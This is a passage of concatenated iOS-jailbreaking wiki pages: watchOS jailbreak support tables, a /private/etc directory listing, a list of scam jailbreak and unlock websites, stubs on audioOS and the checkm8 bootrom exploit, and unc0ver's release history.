| colspan="4" {{no}}
|-
| 5.2.1
| colspan="4" {{no}}
|-
| 5.3
| colspan="4" {{no}}
|-
| 5.3.1
| colspan="4" {{no}}
|-
| 5.3.2
| colspan="4" {{no}}
|-
| 5.3.3
| colspan="4" {{no}}
|-
| 5.3.4
| colspan="4" {{no}}
|-
| 5.3.5
| colspan="4" {{no}}
|-
| 5.3.6
| colspan="4" {{no}}
|-
| 5.3.7
| colspan="4" {{no}}
|-
| 5.3.8
| colspan="4" {{no}}
|}

====6.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="5" | Device
|-
! [[Apple Watch Series 1]]
! [[Apple Watch Series 2]]
! [[Apple Watch Series 3]]
! [[Apple Watch Series 4]]
! [[Apple Watch Series 5]]
|-
| 6.0
| colspan="2" rowspan="11" | No Tool Available
| colspan="2" rowspan="2" {{n/a}}
| colspan="3" {{no}}
|-
| 6.0.1
| colspan="3" {{no}}
|-
| 6.1
| colspan="5" {{no}}
|-
| 6.1.1
| colspan="5" {{no}}
|-
| 6.1.2
| colspan="5" {{no}}
|-
| 6.1.3
| colspan="5" {{no}}
|-
| 6.2
| colspan="5" {{no}}
|-
| 6.2.1
| colspan="5" {{no}}
|-
| 6.2.5
| colspan="5" {{no}}
|-
| 6.2.6
| colspan="5" {{no}}
|-
| 6.2.8
| colspan="5" {{no}}
|}

==See Also==
* [[Failbreak]]
* [[Jailbreak Exploits]]
* [[Kernel Patches]]

[[Category:Jailbreaking]]

/private/etc

2020-07-14T20:52:14Z

Inflatable Man: /* Folders */

This folder is specified by the [[wikipedia:Filesystem Hierarchy Standard|FHS]] as a place that "contains configuration files" (i.e. "local file[s] used to control the operation of a program"). Most of the folders here are not present in jailed iOS except for raccoon, asl, and ppp.

== Children ==
=== Folders ===
* {{ipfw|alternatives}}
* {{ipfw|apt}}
* {{ipfw|asl}}
* {{ipfw|bluetool}}
* {{ipfw|default}}
* {{ipfw|dpkg}}
* {{ipfw|pam.d}}
* {{ipfw|ppp}}
* {{ipfw|profile.d}}
* {{ipfw|racoon}}
* {{ipfw|rc.d}} (not present in jailed iOS)
* {{ipfw|ssl}}

=== Files ===
* {{ipfw|afp.conf}} (not present in the newer iOS versions)
* {{ipfw|asl.conf}}
* {{ipfw|fstab|fstab}}
* {{ipfw|group}}
* {{ipfw|hosts}}
* {{ipfw|host.equiv}}
* {{ipfw|launchd.conf}} (see also: [[launchd.conf Untether]]; not present in the newer iOS versions)
* {{ipfw|master.passwd}}
* {{ipfw|networks}}
* {{ipfw|notify.conf}}
* {{ipfw|passwd}}
* {{ipfw|profile}} (not present in the newer iOS versions)
* {{ipfw|protocols}}
* {{ipfw|services}}
* {{ipfw|ttys}}

== Parents ==
{{parent|private}}

== References ==
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html#ETCHOSTSPECIFICSYSTEMCONFIGURATION FHS 2.3 on /etc]

Scam Jailbreaks and Unlocks

2020-06-26T02:59:59Z

Inflatable Man: /* Jailbreak fakes */

This is an ''incomplete'' list of community-reported '''scam sites''' that pretend to distribute or sell jailbreaking and unlocking tools/services. (There are many other scam sites not listed here yet.)

If you see a site selling jailbreaking or unlocking software (or asking you to do a survey before downloading), it's a scam. (Companies make money when you fill out surveys, so they promise a jailbreak to get you to fill them out.) Scam sites may also provide free fake tools that actually install adware or other kinds of malware in order to make money from you. Some legitimate forms of unlocking are not free - third-party IMEI unlocks and SIM interposer devices both cost money - but ultrasn0w is always free.

In general, please consider: '''is what the site promises too good to be true?''' Does it promise a new jailbreak for the latest iOS version, when nobody from trusted sources (such as well-known blogs or Reddit or developers on Twitter) is talking about this new jailbreak? When a real new jailbreak gets released, huge numbers of people talk about it - so if you find something people aren't talking about, be very skeptical and check trusted sources.

=== You can contribute to this list ===

Please contribute to this list if you find a scam site. By listing them here, we can help people find good information when they search Google for more information about these sites. If your site is listed here and you believe that's a mistake, you may contact an administrator to request removal.

Be sure not to link to these pages, as all links will boost their Google ranking.

== Jailbreak fakes ==
{| class="wikitable"
|-
! Domain !! Notes
|-
| 3kjailbreak.com || Fake
|-
| 4na.weebly.com || Fake
|-
| 7evasi0n.com || Fake
|-
| 7jailbreak.com || On-device survey scam
|-
| 71jailbreak.com || Fake
|-
| 8jailbreak.net || Fake
|-
| alphajailbreak.com || Survey scam
|-
| alpinejb.blogspot.com || Fake
|-
| apps.appshed.com/[various #] || On-device fake, webclips and profiles
|-
| celtikios7.com || Survey scam
|-
| checkrain.com || (Not checkra1n.com, which is legit) Fake, AppStore rank booster.
|-
| checkrain.org || Fake
|-
| checkra1n-windows.com || Fake, asks for money
|-
| cyberelevat0r.net || Fake
|-
| cyberelevat0r.us || Fake
|-
| cydia8jailbreak.com || Fake has you download multiple free-to-play apps hoping for in-app purchases
|-
| cydiaappdownloader.wordpress.com || Fake. Virustotal.com analysis: 39 of 56 scanners detect malware.
|-
| cydiacloud.com || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.
|-
| cydia-download.us || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.
|-
| cydiadownloaders.com || On-device webclip scam offering $14.99 & $19.99 memberships
|-
| cydiafree.com || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.
|-
| cydiainstall9.weebly.com || Fake, makes you download apps from the AppStore, promo video has obvious edit.
|-
| cydiajailbreak.org || Scam. Offers links to taig-download.com offering $14.99 & $19.99 memberships
|-
| cydiapro.com || Scam. On-device webclip offers membership for donations of $14.99 & $19.99
|-
| cyrooting.com || Affiliated with cydia-download.us which installs a profile from cyrooting.com
|-
| downgradeios7.com || Fake on-device downgrade tool
|-
| downgradeios8.com || Fake on-device downgrade tool
|-
| downgradeiphone.com || Sells a false promise (universal iOS/baseband downgrade) for $29
|-
| downloadcydiainstaller.weebly.com || Scam, part of cydiapro.com group
|-
| downloadpangu.org || Fake
|-
| ecydia.com || Sells an unspecified tool for $24.99
|-
| en-pangu.com || Fake, affiliated with i0n1c.com and taig9.com
|-
| equsi0n.com || Survey scam
|-
| evad3rs.me || No survey, not selling anything, just has downloads of evasi0n 1.0.7, calling it 1.0.8 and saying it works on iOS 7.1.x. Pointless.
|-
| evad3rsdevteam.com || Survey scam, copy of evasi0n.com
|-
| evad3rs-devteam.com || Copy of evasi0n.com
|-
| evad3rsjb.com || Fake
|-
| evad3rsteam.com || Survey scam
|-
| evasi0nblog.com || Repackaged evasi0n
|-
| evasi0ndevteam.com || Sells evasi0n for $15
|-
| evasi0njb.net || Copy of evasi0n.com
|-
| evasion-jailbreak.com || Survey scam
|-
| evasion-jailbreak7.com || Survey scam
|-
| evasi0n-jailbreak.net || Survey scam, copy of evasi0n.com
|-
| evasi0njailbreak.com || Fake
|-
| evasion7.com || Fake
|-
| evasion7download.info/pangu || Malware. See [https://www.virustotal.com/en/file/fb64d5934ebd946c0a4cd49bb8adb13005a57c0ffb04b77e94d40563b6e001e2/analysis/1418953850/ VirusTotal results]
|-
| evasioniosjailbreak.com || Survey scam
|-
| evasionjailbreak.net || Survey scam, copy of evasi0n.com
|-
| evasionjailbreak.us || Copy of evasi0n.com
|-
| evasionjailbreak7.com || Survey scam
|-
| evasi0n-official.com || Survey scam, loosely copied from evasi0n.com
|-
| evasl0n.blogspot.com || Survey scam, copy of evasi0n.com
|-
| evasi0n7.com/pangu || Fake
|-
| evasion7download.info || Malware. See [https://www.virustotal.com/en/file/fb64d5934ebd946c0a4cd49bb8adb13005a57c0ffb04b77e94d40563b6e001e2/analysis/1418953850/ VirusTotal results]
|-
| evasion7-jailbreak.com || Fake
|-
| evazi0n.net || Fake
|-
| ex0dus-jailbreak.com || Unspecified tool, claims to be developed by @planetbeing and @pimskeks. Survey scam after being strung along downloading a fake tool which requires a patch, said patch download requiring survey completion.
|-
| factory-directme.com || Sells redsn0w for $14.95
|-
| firest0rm.net || Survey scam
|-
| freed0md00r.com || Survey scam
|-
| future7ios7.com || Survey scam
|-
| geeksn0w.net || Copy of geeksn0w.it
|-
| geeksn0w.net/pangu || Fake
|-
| geeksn0wdownload.com || Copy of Geeksn0w.it
|-
| getelectra.com || Fake
|-
| getthebest365.com || Sells unspecified tool for $27.00
|-
| getcydiapro.com || Requires downloading apps
|-
| greenpois0n-gc.blogspot.com || Survey scam
|-
| hexxaplus.com || Fake, claims 13.4 support, installs profile from pangu8.com
|-
| icysn0w.com || Survey scam
|-
| idevicehacker07.com || Fake, claims to install R4m0n JB for iOS 9
|-
| idowngrade.com || Survey scam
|-
| iemu.org || Fake; previous site for [[iEmu]]
|-
| ievad3rs.com || Survey scam
|-
| ijailbreak-iphone.com || Sells an unspecified tool for $19.95
|-
| ijailbreaking.com || Fake, see iosjailbreakings.com entry
|-
| ijailbreakpro.com || Sells an unspecified tool for $29.90, $39.90 and $49.90
|-
| ijailbreakpro.net || Sells an unspecified tool (for $29.90, $39.90, and $49.90), to which the most expensive purchase is required to use the tool more than once.
|-
| ijailbreaktool.com || Sells an unspecified tool for $24.99
|-
| imessagewin.com || Claims to have iMessage for Windows platform; Survey scam
|-
| ineedjailbreak.com || Sells evasi0n / redsn0w for $24.95
|-
| inj3ct3d.klikkit.co.uk || asking for donations to publish a non-existent jailbreak
|-
| insanelyios.blogspot.com || Downgrade fake, survey scam
|-
| instajailbreaker.com || Sells unspecified tool(s) for $29.95
|-
| installcydia.mobi || Fake. Takes you to appial.com for freemium appstore games
|-
| instantjb.com || Fake. Installs multiple profiles. Sells "premium" cydia for $9.99
|-
| ios-6-1-4-jailbreak.com || Survey scam
|-
| ios-jailbreak.com || Provides fake iOS 9.3 jailbreak tool that includes malware
|-
| ios8jailbreak.org || Fake
|-
| ios8jailbreak.tk || Fake (alternate domain name is ios8-jailbreak.weebly.com)
|-
| ios8jailbreakdownload.net || Survey scam
|-
| ios8pangu.com || Fake, webclip. Wants to install unsigned profile that cannot be removed
|-
| ios9.semijb.com || See semijb.com entry
|-
| ios11.site || Survey scam
|-
| iosjail.com || Survey scam
|-
| iosjailbreak.org || Scam. Links to webclip sites with $14.99 & $19.99 memberships for fake cydia
|-
| iosjailbreak.top || Requires downloading apps
|-
| iosjailbreakings.com || Fake, sends you to ijailbreaking.com
|-
| iosjailbreakpangu.com || Survey scam. Good copy of real pangu site
|-
| ipadjailbreak3.com || Forwards to jailbreakunlock.org
|-
| ipangu.net || Fake. Passworded zip files
|-
| iphone5break.com || Sells unspecified tool for $49.99
|-
| iphonejailbreakplus.com || Sells evasi0n / redsn0w for $29.95
|-
| iphonejailbreak-unlock.com || Sells unspecified tool for $27.00
|-
| iremotejb.com || Fake. AppStore app download scheme to boost app rankings and profit scammer via in-app advertising.
|-
| irevert.wordpress.com/ || Claims to be able to downgrade firmware
|-
| i0n1c.com/jailbreak-ios-9.1 || Fake browser-based tool
|-
| jail-ios.com || App Store app download scam, also a survey scam. They should sell it outright for the trifecta.
|-
| jailbreak.cc || Sells jailbreaking tools
|-
| jailbreak.live || Fake
|-
| jailbreak-7.com || App Store app download+play time required, artificially inflating its popularity
|-
| jailbreak-absinthe.com || Survey scam
|-
| jailbreak-ios-7.com || Tells people to go to thejailbreakshop.com
|-
| jailbreak-ios7.net || Sells unspecified tools for $29.95 and $39.95
|-
| jailbreak-my-ipad.org || Sells evasi0n / redsn0w for $29.95 '''per month'''
|-
| jailbreak-my-iphone.com || Sells unspecified tool for $29.97
|-
| jailbreak-official.com || Sells "jailbreak membership" for $19.99
|-
| jailbreak-team.com || Sells an unspecified tool for $29.99
|-
| jailbreak71.com || Fake
|-
| jailbreak7wizz.com || Links to jailbreakthings.com, which in turn links to instajailbreaker.com, which sells unspecified tools for $29.95
|-
| jailbreakandunlock1.pressdoc.com || Blog that is about jailbreak and unlock which uses fake tools.
|-
| jailbreakbj.com || Survey scam
|-
| jailbreakgenie.com || Scam. Sells unspecified jailbreak tool for $9.99
|-
| jailbreakios7untethered.com || Survey scam, all set up in advance for iOS 7
|-
| jailbreakiosnewversion.elitegamershub.com || Survey scam, copied/modified verion of evasi0n7
|-
| jailbreakiphone5s.com || Tells people to go to thejailbreakshop.com
|-
| jailbreakme10.com || ICU's attempt to cash in on Yalu
|-
| jailbreakmenow.net || Sells unspecified tools for $19.95, $29.95, and $39.95
|-
| jailbreaknewiphone.com || Survey scam after being strung along downloading a fake tool
|-
| jailbreaktheipad2.com || Sells unspecified tool for $14.95
|-
| jailbreakthings.com || Exists solely to promote instajailbreaker.com, a scam site
|-
| jailbreakunlock.info || Sells unspecified tools for $19.95, $29.95, and $39.95
|-
| jailbreakunlock.org || Sells evasi0n / redsn0w for $14.95
|-
| jailbroke.info || Sells jailbreaking "solutions"
|-
| jbadd.com || Requires downloading apps
|-
| k33n.mobi || Survey scam
|-
| k33nweb.com || Fake
|-
| latestiphoneunlock.com || Sells an unspecified tool for $9.95 or $29.95
|-
| linxijb.weebly.com || Fake
|-
| newios7jailbreak.com || Directs visitors to unlock-jailbreak.net
|-
| oneclickjailbreak.com || Sells an unspecified tool for at least $29.95
|-
| opensn0w.net || Survey scam
|-
| overcast7.com || Survey scam
|-
| pangu8.com || Fake. Installs webclip from semijb.com
|-
| pangu8.us || Scam. Part of the cydiapro.com group of on-device webclip scams with $14.99 & $19.99 "memberships"
|-
| pangu9.net || Scam. Charges paid "memberships"
|-
| pangu9.mobi || Fake
|-
| pangu10.mobi || Claims to have "injected" cydia into App Store apps, makes money off of you installing the apps.
|-
| pangu11.mobi || Fake, see pangu10.mobi
|-
| pangucydia.com || Survey scam
|-
| pangudownload.com || Fake
|-
| pangu-download.net || Fake
|-
| pangu-jailbreak.com || Fake
|-
| pangujailbreak.info || Fake, survey scam, poor things can't even pay their hosting bill :)
|-
| pangujb.blogspot.com || Fake
|-
| pangujb11.com || Survey scam
|-
| pangulive.com || Survey scam
|-
| pangunow.com || Fake
|-
| pod2gblog.blogspot.com || Copy of pod2g's blog
|-
| p0sixspwn.co || Windows version is a malware downloader that eventually downloads the real [[p0sixspwn]]
|-
| posixspwndownload.com || Copy of [[p0sixspwn]]
|-
| ppjailbreak.com || Copy of [[PPJailbreak]] and copyright infringement
|-
| ppjailbreakdownload.com || Fake. Has links to real tools.
|-
| premiumjailbreak.com || Sells jailbreaking tools
|-
| purpletools.wordpress.com || (and all the other sites/people offering similar stuff) Scam - Claims access to Apple's internal VPN
|-
| redpois0n.net || Survey scam
|-
| red-snow.com || Sells unspecified tools for $29.95 and $39.95
|-
| redsn0w-r9-new.blogspot.com || Survey scam, text is ripped from Dev-Team Blog
|-
| ricojb.com || Requires downloading apps
|-
| rocky-racoon.com || Survey scam, copy of Dev-Team Blog
|-
| safera1n.com || Sells an unspecified tool for $24.99
|-
| saigonjb.com || Fake. AppStore app download scheme
|-
| silv3rwind.com || Sells an unspecified tool for $20
|-
| semijb.com || Fake. Does not install "the cydia."
|-
| semirestore.org || Fake redistributions of SemiRestore and SemiRestore7
|-
| spirit-jb.com || Survey scam
|-
| spiritjb.net || Survey scam
|-
| synergyjailbreak.com || Survey scam
|-
| taig-download.com || Scam. On-device webclip offers membership for $14.99 & $19.99
|-
| taig-nc.blogspot.com || Survey scam
|-
| taig8.net || Fake
|-
| taig9.com || Fake
|-
| taig9.mobi || Fake. AppStore app download scheme to boost app rankings and profit scammer via in-app advertising.
|-
| taig10.mobi || Fake. AppStore app download scheme.
|-
| taigremote.com || On-device app-download scam, basically a survey scam
|-
| team7jailbreak.com || On-device survey scam (redirects to 7jailbreak.com). [https://twitter.com/search?q=It%27s%20easy.%20%20Follow%20this%20realy%20simple%20guide%20from%20%40teamjailbreak7&src=typd&f=realtime Known to spam on Twitter]
|-
| theios7jailbreaker.com || Directs people to scam sites (ijailbreakpro.com, appleunlocker.com, ijailbreaktool.com)
|-
| theios8jailbreak.com || Fake
|-
| thejailbreakshop.com || Sells an unspecified tool for $29.97 and $49.97
|-
| topangajb.com || Fake. AppStore app download (rank boosting) scheme.
|-
| trianglejailbreak.com || Sells jailbreaking tool
|-
| u7xjailbreak.com || Survey scam
|-
| unc0ver.com || webclip, wants to install unsiged, un-removable profile
|-
| unc0ver.org|| copy of unc0ver.dev. Probably fake. Wants to install a profile.
|-
| unc0ver.vip || Copy of unc0ver.dev. Claims 13.3.1 support, wants to install unsigned profile and asks you to complete a survey.
|-
| unja1l.com || Survey scam
|-
| unjailme.com || AppStore rank boosting scheme
|-
| untetheredjailbreakios8.com || Survey scam
|-
| zjailbreak.com || Claims iOS 11 - iOS 13.4.5 jailBreak, wants to install signed profile, claims to be freemium, ask for money donations.
|-
|}

== Scam jailbreak and unlock sites ==

{| class="wikitable"
|-
! Domain !! Notes
|-
| appleunlocker.com || Sells unspecified jailbreaking + unlocking software for $19.95
|-
| bestra1n.com || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| cheapestiphoneunlock.com || Sells unspecified jailbreaking + unlocking software for $9.99
|-
| deblocage-iphone-fr.com || Sells unspecified unlocking software for €29.99
|-
| desbloquear-iphone-pro.com || Sells unspecified unlocking software for €29.99
|-
| e-imeiunlock.com || Survey scam
|-
| easyiphoneunlocking.com || Sells unspecified jailbreaking + unlocking software for $24.95
|-
| easyunlockiphone.net || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| easyunlockingsolutions.com || Sells unspecified unlocking software for $19.99
|-
| how-jailbreak-iphone.com || Sells unspecified jailbreaking + unlocking software for $19.95
|-
| ih8sn0w.mobi || Sells who knows what for 20 Euros. Quite funny, but don't be a sucker.
|-
| ijailbreakpro.com || Sells redsn0w for $29.90, $39.90, or $49.90
|-
| ijailbreaktool.com || Sells unspecified jailbreaking software for $24.99
|-
| ios7jailbreaker.net || Survey scam
|-
| ios7jailbreak.fr || Survey scam
|-
| iphone-unlocker.org || Survey scam
|-
| iphone-instant-unlock.com || Sells unspecified unlocking software for $14.95
|-
| iphone-unlock-pro.com || Redirects to unlock4iphone.com, desbloquear-iphone-pro.com, and deblocage-iphone-fr.com
|-
| iphone-unlocker-pro.com || Sells unspecified jailbreaking + unlocking software for $24.95
|-
| iphone-unlock-me.com || Sells unspecified unlocking software for $14.95
|-
| iphone-unlockme.com || Sells unspecified unlocking software for $14.95
|-
| iphone5break.com || Sells unspecified jailbreaking + unlocking software for $49.99
|-
| iphoneimei.net || Fake
|-
| iphoneunlocker.org.uk || Sells unspecified jailbreaking + unlocking software for £14.99
|-
| iphoneunlockersoftware.com || Sells unspecified jailbreaking + unlocking software for $24.97
|-
| iphoneunlockplus.com || Sells unspecified unlocking software for $22.99
|-
| iphoneunlockwiz.com || Sells unspecified jailbreaking + unlocking software for $29.97
|-
| jailbreakandunlockiphones.com || Glowing reviews of, and links to, scam sites which are mostly offline now
|-
| jailbreakiphone5express.com || Links to ijailbreakpro.com, appleunlocker.com and ijailbreaktool.com
|-
| myappledownload.com || Sells undefined non-existing jailbreaks, unlocks, downgrades for $19.99
|-
| mydowngrade.com || Sells undefined non-existing jailbreaks, unlocks, downgrades for $19.99
|-
| myunlocker.org || On-device survey / app download scam
|-
| officialiphoneunlock.co.uk || Fake
|-
| phoneunlockguy.com || Sells unspecified jailbreaking + unlocking software for $14.95
|-
| solutions-directme.com || Sells unspecified jailbreaking software for $14.95
|-
| superiorsim.com || Sells SIM interposers, reported to be a scam by various websites
|-
| superunlockiphone.com || Sells unspecified jailbreaking + unlocking software for £14.99
|-
| tracyandmatt.co.uk || Refers victims to unlock-jailbreak.net
|-
| transx-solutions.com || Sells software for $14.95 which does not say what it is. Also requires a download
|-
| trusted-iphone-unlocker.com || Sells unspecified jailbreaking + unlocking software for $24.95
|-
| ultimateiphoneunlocker.com || Sells unspecified unlocking software for $19.95
|-
| unlock-your-phones.com || Sells evasi0n as an unlock for €8.99
|-
| unlock-apple-iphone.com || Sells unspecified jailbreaking + unlocking software for $29.99
|-
| unlock-appleiphone.com || Sells IMEI unlocks for ANY carrier (including Singtel, which is factory unlocked, and including Sprint, which is nearly impossible, and certainly not done for that price) for $29.95
|-
| unlock-ijailbreak.net || Added a letter to the URL, otherwise it's the same site as unlock-jailbreak.net
|-
| unlock-iphone.info || Fake. Claims that donating will expedite your request.
|-
| unlock-jailbreak.net || Sells unspecified unlocking software for $24.99
|-
| unlock-jailbreak-iphone.com || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| unlock-the-iphone.com || Sells unspecified jailbreaking + unlocking software for $29.95, $37.95, or $49
|-
| unlock4iphone.com || Sells unspecified unlocking software for $29.99
|-
| unlockimeiiphone.com || Sells unspecified jailbreaking + unlocking tool for $19.95
|-
| unlockingfox.com || Survey scam
|-
| unlockiphone.net || Sells unspecified jailbreaking + unlocking tool
|-
| unlockiphone.org || Sells unspecified unlocking software for $24.95
|-
| unlockiphoneios5.com || Sells unspecified jailbreaking + unlocking software for $14.95
|-
| unlockiphonenow.org || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| unlockiphonepro.com || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| unlockjailbreaktool.com || Sells unspecified jailbreaking + unlocking software for $24.99
|-
| unlockmecentral.com || Sells jailbreaking "membership"
|-
| ultrasn0wtool.com || Claims to unlock via a GUI app
|-
| ziphone.org || Directs visitors to iphone-unlocker-pro.com
|}

AudioOS

2020-06-25T23:38:14Z

Inflatable Man:

{{lowercase}}
'''audioOS''' is the operating system used by the [[HomePod]]. It is a forked version of tvOS as of 13.4 (prior to 13.4, it was a forked version of iOS).

The first version of audioOS is marketed as 11.0. An OTA update was released before the HomePod's launch as 11.0.2. OTAs with broadened firmware requirements are prefixed with "9.9." (example: 9.9.11.0.2).

The shell for audioOS is called by "SoundBoard" (instead of [[SpringBoard]]), although it has no user interface. Most frameworks and applications are replaced with HomePod equivalents that are prefixed with "Air."

{{stub|software}}
[[Category:Firmware]]

Checkm8 Exploit

2020-06-10T15:15:48Z

Inflatable Man: Added that checkm8 also supports Haywire and Homepod

{{lowercase}}
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, bridgeOS, audioOS, and Haywire devices with processors between an A5 and an A11, a S1P and a S3, a S5L8747, and a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.

[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit.

== References ==
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]
* [https://news.ycombinator.com/item?id=22849837 https://news.ycombinator.com/item?id=22849837]
* [https://arstechnica.com/information-technology/2019/09/developer-of-checkm8-explains-why-idevice-jailbreak-exploit-is-a-game-changer Developer of Checkm8 explains why iDevice jailbreak exploit is a game changer]

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

Unc0ver

2020-06-10T13:31:00Z

Inflatable Man: Added that unc0ver supports iOS 13.5.5~b1

{{lowercase}}{{Infobox software
| name = unc0ver
| title = unc0ver
| developer = [https://twitter.com/pwn20wnd pwn20wnd] [https://twitter.com/sbingner sbingner]
| released = {{Start date|2018|10|13|df=yes}}
| latest release version = v5.2.0
| latest release date = {{Start date and age|2020|06|09|df=yes}}
| operating system = iOS
| language = English
| genre = Jailbreaking
| website = [https://unc0ver.dev The Official Website] [https://www.reddit.com/9nwxei/ The Reddit thread] [https://github.com/pwn20wndstuff/Undecimus The GitHub repo]
}}
'''unc0ver''' is a [[semi-untethered jailbreak]] for all devices running iOS 11.0 through 13.5.5~b1, (excluding iOS 12.3-12.3.2, 12.4.1-12.4.7, and 13.5.1)

In order to download the latest IPA, download links from the README section has been moved to the releases section of the repository (you can find this by looking under the colored bars where you can find the releases page which is in the middle, alongside branches and contributors).
==Release History==
{| class="wikitable"
|-
! Version
! Date
! Changes
|-
| RC1
| {{date|2018|10|13}}
|
* Initial release
|-
| RC2
| rowspan="5" | {{date|2018|10|14}}
|
* Add the Dynastic repo by default
* Fix a bug in firmware checker
|-
| RC3
|
* Add a switch to manually enable restoring RootFS
* Stop erasing user preferences when restoring RootFS
* Fix bugs
|-
| RC4
|
* Add a label to display the uptime
* Add a label to display the app's version number
* Spawn to the PATH
* Stop bundling system fonts
|-
| RC5
|
* Run videosubscriptionsd in the jailed state
* Fix a bug in firmware and update checker
|-
| RC6
|
* Start logging again
* Improve update checker
* Fix multi_path
|-
| RC7
| {{date|2018|10|17}}
|
* Fix a bug in RootFS Restore and multi_path
|-
| RC8
| {{date|2018|10|18}}
|
* Fix a bug in RootFS Remount
* Add a work in progress warning for some firmwares
|-
| RC9
| {{date|2018|10|19}}
|
* Fix a bug in RootFS Remount
* Add even more detailed error messages
* Add a switch to increase the memory limit to improve the stability
* Improve the compatibility layer to work correctly with some tweaks that were specifically made for the other jailbreaks
|-
| v1
| {{date|2018|10|20}}
|
* Fix a bug in RootFS Restore and Remount
* Make the settings tab match with the rest of the UI
* Fix bugs
|-
| v1.0.1
| {{date|2018|10|21}}
|
* Disable the RootFS Restore for the unstable versions
|-
| v1.0.2
| {{date|2018|10|22}}
|
* Enable and fix the RootFS Restore for all versions
|-
| v1.0.3
| {{date|2018|10|23}}
|
* Fix the beta firmwares
|-
| v1.1
| {{date|2018|10|27}}
|
* Automatically select the best exploit
* Rewrite the versions checker
* Improve assertion
* Show the code which has failed in the error messages
* Improve memory management
* Optimize and clean up the code
* Fix the Storage settings
* Switch to a new technique to disable auto updates
* Remove so much useless logging
* Only set the boot-nonce if the switch is on without checking if it exists or not
* Log offsets
* Remove static sleeps to improve the speed
* Fix series of bugs and leave no known bug
|-
| v1.1.1
| rowspan="2" | {{date|2018|11|03}}
|
* Add a label to show the ECID
* Add a button to open the source code
* Improve auto layout
* Fix various bugs within RootFS interaction, Icon cache refresher, Version checker, Exploit selector, jailbreak state detector and others
|-
| v1.1.2
|
* Improve auto layout and code
* Significantly improve Empty_List (VFS) exploit
* Slightly improve Multi_Path (MPTCP)
|-
| v1.1.3
| rowspan="2" | {{date|2018|11|06}}
|
* Fix a bug in starting jailbreakd
|-
| v1.1.4
|
* Fix a bug in finding offsets
|-
| v2.0
| {{date|2018|11|30}}
|
* Initial Cydia Substrate support
* OTA upgrades for the jailbreak patches from Cydia without rebooting
* A new button to restart SpringBoard from the jailed state
* A switch to (re)install OpenSSH
* A switch to reinstall Cydia
* A switch to restart backboardd only so that you can jailbreak with broken tweaks
* Fix and update bootstrap
* Fix for the jailbreakd error
* Battery life fixes
* ELOD (Electra Loop Of Death) mitigations
* Improve the speed of system reload
* Fixes for countless bugs
* Enable Restart and Restart SpringBoard buttons on iOS 11.4 - 11.4.1 (Jailbreak itself doesn't work on iOS 11.4 - 11.4.1)
* Improve the reliability of the Restart button
* Fix the broken multi_path entitlement check
* Add the compatibility layer for the other jailbreaks back to fix the apps like iCleaner
* Fix the famous snapshot creation bug
* Add a button to manually reset the logs instead of automatically resetting them when the diagnostics button is tapped
* Fix the trust cache injection bug
|-
| v2.0.1
| {{date|2018|12|02}}
|
* The official release of v2.0 with a version number bump to make tracking versions easier
|-
| v2.0.2
| {{date|2018|12|06}}
|
* Fix bugs in the app
* Improve the the speed of the jailbreak
* Update bundled resources
* Switch to a new technique for blocking revokes
|-
| v2.1
| {{date|2018|12|14}}
|
* Make internal changes to make fixing issues easier
* Add T-Mobile support for the revoke disabler
* Make re-jailbreaking without restarting possible
* Make switching from Electra possible without restoring RootFS
* Update bundled resources
* Fix a bug in extracting bootstrap
* Only quit the app if the error is fatal
* Fix a bug in loading daemons
* Make the jailbreaking process faster and more stable
* Add more feedback to the user interface
* Other fixes and improvements
* Fix a bug in extracting bootstrap that was introduced with the previous build
* Fix a bug in installing Cydia that was introduced with the previous build
* Fix a bug in switching from Electra without restoring RootFS
* Update "No Tweaks" mode to support new "Disable Loader" option in Cydia Substrate
* Added the ability to completely disable jailbreakd when Substrate is installed via a future Cydia update.
* Add internal support for completely disabling jailbreakd with a Resources update
* Make a special alert for the exploit error to make it more clear
* Automatically reboot when the user taps "OK" on the exploit error
* Improve the version checker
* Fix a really weird bug in the system that would stop Cydia Substrate from loading tweaks although this bug isn't caused by the tool
* Make the UI support different font sizes or styles (E.g. Bold Text)
* Add the initial localization support (No localizations included yet)
* Reduce the number of stages
* Fix a bug in installing OpenSSH
* Switch to Sam Bingner's new superb trust cache injector thereby enable support for dual-hash signatures
* Don't update the hosts file unless it is needed
* Unblock Saurik's repo if it is blocked
* Reduce the number of stages
* Remove unnecessary checks
* Avoid applying unnecessary kernel patches unless they are needed
* Make sure that the system snapshot was correctly mounted before using it
* Unmount the system snapshot after root filesystem snapshot bypass or restore
* Simplify the credits view
* Don't do unnecessary logging
* Improve empty_list (vfs) exploit's success rate
* Fix runCommand to correctly log
* Don't run jailbreakd if Cydia Substrate is installed
* Don't set the boot nonce if it already is
* Make obvious internal changes
* Make jailbreaking obviously faster
* Fix a brutal kernel memory leak
* Fix shutdown or halt leading to a reboot
* Fix a logic error that would disable jailbreak patches when Substrate was installed but Load Daemons was disabled that was introduced with the previous build
* Fix a bug in RootFS Restore for iOS 11.0 - 11.2.6 that was introduced with the previous build
* Fix a bug in trust cache injection
* Improve update checker
* Make jailbreaking obviously faster
* Fix a bug in RootFS Restore for iOS 11.0 - 11.2.6 that would cause it to not work on some devices
* Fix a bug in update checker
* Fix a bug in the posix_spawn wrapper that would cause weird issues on some devices (Known for causing the "(24/40)" issue)
|-
| v2.1.1
| {{date|2019|01|05}}
|
* Make jailbreaking faster
* Don't error out if the hosts file doesn't exist
* Ignore dependencies in Cydia reinstallation
* Fix false positives
* Clean Cydia's user data in RootFS Restore
* Fix a snapshot name confusion bug in RootFS Restore
